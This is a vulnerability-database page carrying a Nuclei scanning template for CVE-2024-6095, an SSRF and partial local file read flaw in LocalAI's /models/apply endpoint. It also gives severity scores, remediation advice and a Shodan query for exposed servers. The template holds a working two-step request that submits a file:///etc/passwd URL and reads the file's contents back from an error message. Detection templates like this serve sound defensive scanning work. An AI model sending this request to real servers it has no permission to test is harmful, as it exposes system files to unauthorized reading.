Lucene search
K

LocalAI - Partial Local File Read

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

LocalAI - Partial Local File Read vulnerability in /models/apply endpoin

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-6095
6 Jul 202420:41
circl
CNNVD
LocalAI Code Issues Vulnerabilities
6 Jul 202400:00
cnnvd
CVE
CVE-2024-6095
6 Jul 202417:48
cve
Cvelist
CVE-2024-6095 SSRF and Partial LFI in /models/apply Endpoint in mudler/localai
6 Jul 202417:48
cvelist
NVD
CVE-2024-6095
6 Jul 202418:15
nvd
Positive Technologies
PT-2024-37382 · Unknown · Mudler/Localai
6 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-6095
23 May 202510:14
redhatcve
Veracode
Server-Side Request Forgery
8 Jul 202404:23
veracode
Vulnrichment
CVE-2024-6095 SSRF and Partial LFI in /models/apply Endpoint in mudler/localai
6 Jul 202417:48
vulnrichment
id: CVE-2024-6095

info:
  name: LocalAI - Partial Local File Read
  author: iamnoooob,pdresearch,rootxharsh
  severity: medium
  description: |
    A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s)-// and file-// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17.
  impact: |
    Attackers can exploit SSRF to access internal HTTP services and partially read local files through error messages, potentially exposing sensitive information.
  remediation: |
    Update LocalAI to version 2.17 or later to address the SSRF and LFI vulnerabilities.
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/sev-hack/sev-hack
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6095
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-6095
    cwe-id: CWE-918
    epss-score: 0.02475
    epss-percentile: 0.82587
    cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mudler
    product: localai
    shodan-query: http.favicon.hash:-976853304
  tags: cve,cve2024,localai,mudler,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /models/apply HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"file:///etc/passwd"}

    extractors:
      - type: json
        part: body
        name: uuid
        internal: true
        json:
          - ".uuid"

  - raw:
      - |
        GET /models/jobs/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ': cannot unmarshal !!str `root:x:...`'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f76e05f56f891ed95254f25b57278799b9d360508ced131b6cd972a7ccc87afe022100a46d9e479051e3e98baf63e9d7251d66c7acbba86ced86c251d3a326124305b2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.15.8
CVSS 35.8
EPSS0.02475
SSVC
38